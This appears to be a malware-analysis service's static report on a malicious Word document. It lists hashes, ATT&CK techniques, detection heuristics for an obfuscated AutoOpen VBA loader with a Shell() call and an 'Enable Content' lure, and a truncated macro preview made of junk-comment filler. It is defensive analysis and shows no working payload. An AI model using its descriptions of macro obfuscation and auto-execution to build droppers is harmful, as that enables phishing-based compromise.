Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8d368ea4bb3b473e…

MALICIOUS

Office (OLE)

215.5 KB Created: 2018-10-22 14:01:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: 37576661ce0684a712f81046a8e52948 SHA-1: f4110ea19e2641fa3ad0528ed6f27a2ceb3426f9 SHA-256: 8d368ea4bb3b473e7a927e98fb33d67c84de5bce2656179004c06b04fea81485
322 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Microsoft Word document containing obfuscated VBA macros. The document body instructs the user to 'Enable Content' to display the document, a common lure for macro-based malware. The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA code, suggesting the macro attempts to execute external commands or payloads. The presence of a VBA auto-execute macro (AutoOpen) further supports this malicious intent.

Heuristics 9

  • ClamAV: Doc.Malware.Generic-6923090-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6923090-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 166924 bytes
SHA-256: 0a58d8d6de496369872664f83d78978570853cbd7cc53a4cf286882c42fae0cd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
' tu ndfcu bnE ioEc u hio.uh.enunF idnuu nSh.I c uhfch n  n
' STndbeu ubd F TcEchcddnhTu  FE fbnn nneto.onnint e tid t.nISnu  eEF Te nnh   .u nuitfI.o.tnhiud
'  dcncn Tin eFFutFIuT  hEIfo   inFESnnu ccI ffI tn ddETdnI Ebuuo Tfo u  TefdhfEb
' hnnuTnutInbFnb  unIn oEutnenueFuSunndEh nIShE nen hidfnFenIbdeb
' cuoT ndf InuFTfuT buFth.noucuonun
' hfu.eddFnchFc  nucbnuEFcoTTfdt .Sn h ufnnuhn TSunete
'  n uuEnTf  EeuTuSTnT.tonSdEchnih .F IIc  ETnFdSunnEFnne .iutnb.nunntS
' hcIuIn fnFdfn oof.b.Iuu  n..heftnhTnIfnE ho dEFcd.dSud
' .En  bbindSTnnTF  uFnc h ETETTf n.uonnnbEnb  hhESI .nSnbunebSd uE ieu  tc.dSu Itci.n  Iu.u neEnn
' ETIFFIu IietetSSbunnte ehTfuiiS i  u hennnu Sn
' uncTnuoeuIISiT EShid fI    nT oinciuEETucoEneonntTtE nenuEod Eob
'  un  tb nfbodunTTFShn Fb cTFfEEn no fbine.ncuih.cn.di ucFETT u d . Seo  FunEtunF n
' oncTfctcF .  ncnT i nE bd ieunn dInIIn io e htin Fbnu T.  nT .nn Soohhnnn oS F
' ndubcoF d bEdFn f.tnchdItIuedbtTc  ou T .hbSIuSnn EbSE
'  TEeb.uufuci eu tIitt noFno.ct Tdtu.hnnIuuinc ee tnfn ndbuenSoFeFcb ndftnnutE enIh uuFeh nIEh
' t  TTE fni .IutnnSuno Inibb.SunF   u hni .c EnInS.f ifittfun
' Sn eud  oiF hnfu  bd  tefiuuTtcd n bEceuuihodf
'  hdEuitoFhTI e .hT E .hoSdT  huc F nnunfEo u Iuu o nFI  SS  n.onbET.bnT
'  IhInEfu bn E ntIi c t.T bfu SEefe n EfT dn .bde .Fdud o   i ceIFIchunE
' ntfI   c efncShod FTunT.ndffeS.un ein h En bnicfoudne.TIu o   nFo.EcF
' oe   TdTb Fn        uShFedntTe cIbhIIi n nEouucc IdEohnnne  ni n noFn nun.e id.b cT Tn nn  n
' h.t  i eI e uhTE   unF.IifoI hi hTuiSF T nnincbTeTFt.ounnf.I.od.TTeunu ndSI bt
' Fefnoe un.ihIobunoeuFdtnnb n nu n hfthdfhdd. nEt In.n.nnin  hun .f dEeEftdbtun nbEcu
' fuIhb t.duuuu.ebiE.  i  c th  nt fT ocFnIdh nFnutbecincTSnI  dnSbunb n i
' uncT.F nEff nn  euT FIfddnnnfTF Fco t.ehcnbin n.nuo
' ni EtnoFtnon.h necdn tcuu.cn   IihedntIEucEunbnF ToSSnnTeohuItInfnncinnnoEuuhdcnef ub E.du uSiu
'  E  TEcunIufF e  nnd.IuuiTb cctncn bfSn nhTc..cSItIEinfnnIn un . dtothnFehSu.ch.
'   fSuh ocEn  enuFo nhnhi onfut  unnnb cin.f .oF cdbbe deo.n uo n.nenh t EntniI nftun SdIb.Ti
'  et  binIuncFbho t If.nhhcTnfTtu . t
' bunu .  Ie tef i tobuSd.tifE  Eft  FuhneEninFf ibE tfnFfSnF
' uin T Eiee cnI n. n ITSdnnnThbnb EeoSFuFF  edTTecdn  ub u  o  EEIuodTubF buc S dSuFc nuo EnIhodThSu
'   d u n ToEf.h  hc fTfE Eu Ehn.no bdinbni nnn  i ecTeeSt
' bo udEEudduSSo cid .F fSInFeTIF. EEunnn i  Tnbnfochonot .cenSFubf
' uTfFTnTTFbeSuneot. ehunbdh n. nff ictI.bnf  ci Iontnu
' thIhScbFSt  e dnb id.E F nndneF buF u hncnn Ton  .Euu uhe
' Eotd.EonuTciuccc nSnuiude.Fi S  u .nFne   uSo Tnun nhFn .e Suif
' En uinniI huibni uuduu.fc f  ccu nodcTeIoctt   hI   unuoenifh.itnnndtcTeT Effd .noiceSdbuETufSt
' cuS Sdc EIbuno nutohohb   I n  cudISiS cun c nhn ff .ucI odnun nSu nnuTEbtt FneuI Ffb.Tnf
' nu nFtch  dnnchu ef  unt  enh uSEi  nub. dhTiEtffhSehuieS n bdhnI F  cEni nneo t.ucdbndn  nidE TTn
' neSFh    bFhbnu dfuEnunbnFdhnncSTn FSft.EncuTdEncTut I hohFTnTh hn nen
'  d  u ui  . huub SSu cheTnFdEE
' d.tfoc  EI FT  c.h b e.iEnd  FE.n.bionFuEb Eef nc T
'  hotuhnudnuuenbFbutffoo cE.InIhEt. TciE ci o ouo Sdib.nfSuddnt
' t tEi beI n .f Etn tf hfuuuEbtuuuTnofnhcoh i b.iu  SS  I nInSfS doFbcIStT hdbon
' cnuFn E SitnSSn n.noftuf Eu  eueE tu eut nT
' n . fnoI on  bnho Scn bbnc n.unEt..u .nhSu unibFFSnIEbtn.o E E hi h b  T.hhSbnu n dboi   u
' n u.uhEtFT Ftecn.u  ueeo nnnInui  n nn nIeio . cnud.Efu T ofon
' n neEEnni.EI  on ninh.hbnnfEEon  EFTn  neSiFndF b TnnTdbo
' ccItnTootSbu uunSSih  nfnE nf uE .It bnnT..bb  .d I uecu.
' FbIhItTuicI   di nSueoeEndS nnuFtf
' bIcbuE . f it fiTonb.F ucIFeu i uuduSbnI .
' fnuI .bh c uS  hfStbnEfoununIubontT n. f u nnnonF dF difFi
' EuIodF FoeubTt inIfnh S uoEhc STh   ouuubd
'  nbniinin utdbbT.no.  bntn edI .fbh  f. ht
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.